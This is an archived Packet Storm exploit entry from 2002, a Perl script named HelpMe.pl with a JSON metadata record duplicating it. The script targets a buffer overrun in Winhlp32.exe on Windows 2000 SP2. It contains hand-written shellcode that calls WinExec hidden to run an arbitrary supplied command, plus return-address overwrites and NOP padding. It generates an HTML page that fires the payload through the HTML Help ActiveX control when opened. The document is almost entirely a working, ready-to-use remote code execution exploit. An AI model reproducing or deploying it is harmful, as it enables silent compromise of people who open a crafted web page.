ID PACKETSTORM:26541
Type packetstorm
Reporter Gary O'Leary-Steele
Modified 2002-08-13T00:00:00
Description
`# Winhlp32.exe Remote BufferOverrun exploit code. written by Gary O'leary-Steele Sec-1 Ltd. Garyo@sec-1.com
# For use as proof of concept
# Kernel32.dll version 5.0.2195.4272
####### Kernell32 jmp ebx 77E87793
$sploit =
"\x55\x8b\xec\x8b\xc3". #xc5 is ebp change if error
"\xbe\xff\xff\xff\xff".
"\x81\xEE\x85\x85\x85\x85".
"\x83\xc0\x01".
"\x8b\x10".
"\x3b\xd6".
"\x75\xf7".
"\x8b\xd8".
"\x83\xc3\x01".
"\x80\x6b\x03\x41".
"\x8b\x7b\x04".
"\x81\xff\x58\x58\x58\x58".
"\x75\xEE".
"\x81\x6b\x04\x58\x58\x58\x58".
"\x33\xf6".
"\x56".
"\x83\xc0\x04".
"\x50".
"\xbb\x94\xee\xe8\x77". # mov ebx, 0x77e8ee94 winexec() address
"\xff\xd3"; #call ebx
$exitproc =
"\xBB\x5d\xa9\xe8\x77".
"\x83\xeb\x01".
"\xff\xd3";
$RET = "\x24\xF1\x5d\x01";
$EIP2 = "\x93\x77\xe8\x77"; # This works
#$EIP2 = "\xf6\xbf\x30\x78";
# direct jump = 0006FBD4 ##$EIP2 = "\xd4\xfb\x06\x00";
print "Exploit code for Winhlp32.exe Remote BufferOverrun.\nBy Gary Oleary-Steele Sec-1 Ltd\nCalls WinExec SW_HIDE and executes supplied command\nTested on windows 2000 professional SP2\n\n";
print "Enter Command to execute: ";
$command =<STDIN>;
print "Enter Output File: ";
$outputfile =<STDIN>;
chomp $command;
chomp $outputfile;
open(INFILE,">$outputfile");
$command = encode($command);
$nn = 123 - length($command);
$nops = "\x90" x $nn;
$exploit = $sploit . "zzzz". $command .'XXXX'. $nops .$exitproc. $RET .$EIP2;
$f1= <<"file1";
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
VALUE="WinHelp"><PARAM NAME="Item1"
VALUE='
file1
chomp $f1;
$f2= <<"file2";
'><PARAM
NAME="Item2" VALUE="Sec-1 LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>
file2
print INFILE $f1.$exploit.$f2;
sub encode($command){
$lofcmd =length($command);
$i = 0;
for ($i ;$i < $lofcmd; $i++){
$chartoconvert = substr($command,$i,1); # pull out each character
$chartoconvert = ord($chartoconvert); # convert to a dec
for ($b=0; $b < 65; $b++){
$chartoconvert++ ;
}
$tmpchr = chr($chartoconvert); #convert back to chr
$newchar = $newchar . $tmpchr;
}
print $newchar;
return $newchar;
}
`
{"type": "packetstorm", "published": "2002-08-13T00:00:00", "reporter": "Gary O'Leary-Steele", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "6cf9e595fb4dbeacb3535607fd33a4dc"}, {"key": "modified", "hash": "e015c67f46fe53167991e65835c49076"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "e015c67f46fe53167991e65835c49076"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "730091db41b0f82ab3da1b6a897a7d4d"}, {"key": "sourceData", "hash": "7c6b3d20c7c0c6291d709a74f4bad825"}, {"key": "sourceHref", "hash": "7c5acca607196cd6482f6a10d9c52e92"}, {"key": "title", "hash": "bf76dde529ceda70f10c67d51f8b7624"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`# Winhlp32.exe Remote BufferOverrun exploit code. written by Gary O'leary-Steele Sec-1 Ltd. Garyo@sec-1.com \n# For use as proof of concept \n# Kernel32.dll version 5.0.2195.4272 \n####### Kernell32 jmp ebx 77E87793 \n \n \n$sploit = \n\"\\x55\\x8b\\xec\\x8b\\xc3\". #xc5 is ebp change if error \n\"\\xbe\\xff\\xff\\xff\\xff\". \n\"\\x81\\xEE\\x85\\x85\\x85\\x85\". \n\"\\x83\\xc0\\x01\". \n\"\\x8b\\x10\". \n\"\\x3b\\xd6\". \n\"\\x75\\xf7\". \n\"\\x8b\\xd8\". \n\"\\x83\\xc3\\x01\". \n\"\\x80\\x6b\\x03\\x41\". \n\"\\x8b\\x7b\\x04\". \n\"\\x81\\xff\\x58\\x58\\x58\\x58\". \n\"\\x75\\xEE\". \n\"\\x81\\x6b\\x04\\x58\\x58\\x58\\x58\". \n\"\\x33\\xf6\". \n\"\\x56\". \n\"\\x83\\xc0\\x04\". \n\"\\x50\". \n\"\\xbb\\x94\\xee\\xe8\\x77\". # mov ebx, 0x77e8ee94 winexec() address \n\"\\xff\\xd3\"; #call ebx \n \n \n$exitproc = \n\"\\xBB\\x5d\\xa9\\xe8\\x77\". \n\"\\x83\\xeb\\x01\". \n\"\\xff\\xd3\"; \n \n \n$RET = \"\\x24\\xF1\\x5d\\x01\"; \n$EIP2 = \"\\x93\\x77\\xe8\\x77\"; # This works \n#$EIP2 = \"\\xf6\\xbf\\x30\\x78\"; \n \n# direct jump = 0006FBD4 ##$EIP2 = \"\\xd4\\xfb\\x06\\x00\"; \n \nprint \"Exploit code for Winhlp32.exe Remote BufferOverrun.\\nBy Gary Oleary-Steele Sec-1 Ltd\\nCalls WinExec SW_HIDE and executes supplied command\\nTested on windows 2000 professional SP2\\n\\n\"; \nprint \"Enter Command to execute: \"; \n$command =<STDIN>; \nprint \"Enter Output File: \"; \n$outputfile =<STDIN>; \nchomp $command; \nchomp $outputfile; \nopen(INFILE,\">$outputfile\"); \n$command = encode($command); \n$nn = 123 - length($command); \n$nops = \"\\x90\" x $nn; \n \n \n \n$exploit = $sploit . \"zzzz\". $command .'XXXX'. $nops .$exitproc. $RET .$EIP2; \n \n \n \n \n$f1= <<\"file1\"; \n<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 \ncodeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp \ntype=application/x-oleobject width=0><PARAM NAME=\"Width\" \nVALUE=\"26\"><PARAM NAME=\"Height\" VALUE=\"26\"><PARAM NAME=\"Command\" \nVALUE=\"WinHelp\"><PARAM NAME=\"Item1\" \nVALUE=' \nfile1 \nchomp $f1; \n \n$f2= <<\"file2\"; \n'><PARAM \nNAME=\"Item2\" VALUE=\"Sec-1 LTD\"></OBJECT> \n<SCRIPT>winhelp.HHClick()</SCRIPT> \nfile2 \n \nprint INFILE $f1.$exploit.$f2; \n \n \n \nsub encode($command){ \n$lofcmd =length($command); \n$i = 0; \n \nfor ($i ;$i < $lofcmd; $i++){ \n \n \n$chartoconvert = substr($command,$i,1); # pull out each character \n \n$chartoconvert = ord($chartoconvert); # convert to a dec \n \nfor ($b=0; $b < 65; $b++){ \n$chartoconvert++ ; \n} \n \n$tmpchr = chr($chartoconvert); #convert back to chr \n$newchar = $newchar . $tmpchr; \n \n \n \n} \n \nprint $newchar; \nreturn $newchar; \n \n} \n \n \n \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:18:43", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/26541/HelpMe.pl.html", "sourceHref": "https://packetstormsecurity.com/files/download/26541/HelpMe.pl", "title": "HelpMe.pl", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:18:43"}, "dependencies": {"references": [], "modified": "2016-11-03T10:18:43"}, "vulnersScore": -0.2}, "references": [], "id": "PACKETSTORM:26541", "hash": "9d3cac91aa2ea570e3968ffd38f4220c40c7667c2597bfc59497e58713d5447c", "edition": 1, "cvelist": [], "modified": "2002-08-13T00:00:00", "description": ""}
{}
